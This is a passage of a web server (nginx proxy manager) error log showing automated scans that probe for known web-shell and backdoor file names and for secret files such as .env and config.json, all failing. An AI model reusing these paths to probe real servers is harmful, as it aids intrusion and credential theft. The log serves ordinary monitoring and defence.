"profibot.direct.quickconnect.to" +2026/01/28 00:18:50 [error] 295#295: *15561 open() "/var/www/html/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /themes/twentytwentytwo/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:50 [error] 295#295: *15561 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:51 [error] 295#295: *15561 open() "/var/www/html/wp-admin/wp-conflg.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:51 [error] 295#295: *15561 open() "/var/www/html/wp-admin/css/wp-conflg.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:51 [error] 295#295: *15561 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /manager.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:52 [error] 295#295: *15561 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:52 [error] 295#295: *15561 open() "/var/www/html/plugins/Cache/footer.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /plugins/Cache/footer.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:52 [error] 295#295: *15561 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:52 [error] 295#295: *15561 open() "/var/www/html/mail.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /mail.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:53 [error] 295#295: *15561 open() "/var/www/html/wp-content/plugins/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:53 [error] 295#295: *15561 open() "/var/www/html/sx.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /sx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:53 [error] 295#295: *15561 open() "/var/www/html/wp-admin/maint/admin.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:53 [error] 295#295: *15561 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:54 [error] 295#295: *15561 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:54 [error] 295#295: *15561 open() "/var/www/html/byp.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /byp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:54 [error] 295#295: *15561 open() "/var/www/html/wp-trackback.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-trackback.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:54 [error] 295#295: *15561 open() "/var/www/html/.well-known/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /.well-known/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:55 [error] 295#295: *15561 open() "/var/www/html/wp-admin/network/plugins.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/plugins.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:55 [error] 295#295: *15561 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:55 [error] 295#295: *15561 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:55 [error] 295#295: *15561 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:56 [error] 295#295: *15561 open() "/var/www/html/css/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /css/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:56 [error] 295#295: *15561 open() "/var/www/html/wp-includes/SimplePie/wp-login.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:57 [error] 295#295: *15561 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:57 [error] 295#295: *15561 open() "/var/www/html/filemanager/dialog.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /filemanager/dialog.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:57 [error] 295#295: *15561 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:57 [error] 295#295: *15561 open() "/var/www/html/wp-includes/customize/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/customize/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:58 [error] 295#295: *15561 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:58 [error] 295#295: *15561 open() "/var/www/html/uploads/autoload_classmap.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /uploads/autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:59 [error] 295#295: *15561 open() "/var/www/html/wp-includes/style-engine/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style-engine/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:59 [error] 295#295: *15561 open() "/var/www/html/ww1.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ww1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:59 [error] 295#295: *15561 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /about/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:18:59 [error] 295#295: *15561 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:00 [error] 295#295: *15561 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:00 [error] 295#295: *15561 open() "/var/www/html/css/colors/blue/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:00 [error] 295#295: *15561 open() "/var/www/html/security.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /security.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:00 [error] 295#295: *15561 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:01 [error] 295#295: *15561 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:01 [error] 295#295: *15561 open() "/var/www/html/wp-content/upgrade/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/upgrade/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:01 [error] 295#295: *15561 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:01 [error] 295#295: *15561 open() "/var/www/html/wp-content/radio.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:01 [error] 295#295: *15561 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:02 [error] 295#295: *15561 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:02 [error] 295#295: *15561 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:02 [error] 295#295: *15561 open() "/var/www/html/wp-content/plugins/admin.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:02 [error] 295#295: *15561 open() "/var/www/html/wp-content/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:03 [error] 295#295: *15561 open() "/var/www/html/.well-known/log.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /.well-known/log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:03 [error] 295#295: *15561 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:03 [error] 295#295: *15561 open() "/var/www/html/bless5.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /bless5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:04 [error] 295#295: *15561 open() "/var/www/html/wp-includes/js/codemirror/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/codemirror/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:04 [error] 295#295: *15561 open() "/var/www/html/wp-includes/block-patterns/index.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:04 [error] 295#295: *15561 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:05 [error] 295#295: *15561 open() "/var/www/html/ioxi-o1.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:05 [error] 295#295: *15561 open() "/var/www/html/juuuu.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /juuuu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:05 [error] 295#295: *15561 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:05 [error] 295#295: *15561 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:06 [error] 295#295: *15561 open() "/var/www/html/we2.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /we2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:06 [error] 295#295: *15561 open() "/var/www/html/04.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /04.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:06 [error] 295#295: *15561 open() "/var/www/html/333.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /333.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:07 [error] 295#295: *15561 open() "/var/www/html/520.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /520.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:07 [error] 295#295: *15561 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:07 [error] 295#295: *15561 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:07 [error] 295#295: *15561 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:08 [error] 295#295: *15561 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:08 [error] 295#295: *15561 open() "/var/www/html/2clas.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /2clas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:08 [error] 295#295: *15561 open() "/var/www/html/ave.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ave.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:08 [error] 295#295: *15561 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:08 [error] 295#295: *15561 open() "/var/www/html/bibil.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /bibil.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:09 [error] 295#295: *15561 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:09 [error] 295#295: *15561 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:09 [error] 295#295: *15561 open() "/var/www/html/file7.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /file7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:09 [error] 295#295: *15561 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:10 [error] 295#295: *15561 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:10 [error] 295#295: *15561 open() "/var/www/html/nox.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /nox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:10 [error] 295#295: *15561 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:10 [error] 295#295: *15561 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:11 [error] 295#295: *15561 open() "/var/www/html/class9.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /class9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:11 [error] 295#295: *15561 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:11 [error] 295#295: *15561 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:11 [error] 295#295: *15561 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:12 [error] 295#295: *15561 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:12 [error] 295#295: *15561 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:12 [error] 295#295: *15561 open() "/var/www/html/file9.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /file9.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:12 [error] 295#295: *15561 open() "/var/www/html/ac.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ac.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:13 [error] 295#295: *15561 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:13 [error] 295#295: *15561 open() "/var/www/html/pop.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /pop.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:13 [error] 295#295: *15561 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:13 [error] 295#295: *15561 open() "/var/www/html/xaz.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /xaz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:13 [error] 295#295: *15561 open() "/var/www/html/up4.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /up4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:14 [error] 295#295: *15561 open() "/var/www/html/1aa.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /1aa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:14 [error] 295#295: *15561 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /elp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:14 [error] 295#295: *15561 open() "/var/www/html/wtz.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /wtz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:14 [error] 295#295: *15561 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:15 [error] 295#295: *15561 open() "/var/www/html/xb.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /xb.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:15 [error] 295#295: *15561 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:15 [error] 295#295: *15561 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:19:15 [error] 295#295: *15561 open() "/var/www/html/rh.php" failed (2: No such file or directory), client: 20.27.221.169, server: localhost-nginx-proxy-manager, request: "GET /rh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/28 00:51:12 [error] 295#295: *15572 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 01:28:44 [error] 295#295: *17087 open() "/var/www/html/manager/text/list" failed (2: No such file or directory), client: 74.249.128.83, server: localhost-nginx-proxy-manager, request: "GET /manager/text/list HTTP/1.1", host: "91.82.215.191" +2026/01/28 01:36:45 [error] 295#295: *17219 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 03:08:12 [error] 293#293: *18571 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 03:17:08 [error] 293#293: *18574 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 20.64.105.253, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "91.82.215.191" +2026/01/28 03:38:13 [error] 293#293: *18587 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.156.87.161, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 03:53:03 [error] 292#292: *20088 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.252.94, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 03:53:03 [error] 292#292: *20089 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 152.32.252.94, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/28 03:53:03 [error] 292#292: *20090 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 152.32.252.94, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91.82.215.191" +2026/01/28 03:53:29 [error] 292#292: *20091 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 04:32:37 [error] 293#293: *20109 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 185.142.236.41, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 04:32:37 [error] 293#293: *20110 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 185.142.236.41, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/28 04:32:37 [error] 293#293: *20111 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 185.142.236.41, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 04:38:31 [error] 295#295: *21599 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 05:25:53 [error] 299#299: *21636 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 05:48:15 [error] 299#299: *21664 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:27:08 [error] 300#300: *21691 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:08 [error] 300#300: *21692 open() "/var/www/html/conf/.env.dev" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /conf/.env.dev HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:08 [error] 300#300: *21693 open() "/var/www/html/api/.env.prod" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env.prod HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:08 [error] 300#300: *21694 open() "/var/www/html/auth/.env.gcp" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /auth/.env.gcp HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:08 [error] 300#300: *21695 open() "/var/www/html/config/.env.1" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /config/.env.1 HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:08 [error] 300#300: *21696 open() "/var/www/html/config/.env.2" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /config/.env.2 HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:10 [error] 301#301: *24671 open() "/var/www/html/apis/.env.dev" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /apis/.env.dev HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:10 [error] 301#301: *24672 open() "/var/www/html/connexion.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /connexion.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:10 [error] 301#301: *24673 open() "/var/www/html/.env-anaconda" failed (2: No such file or directory), 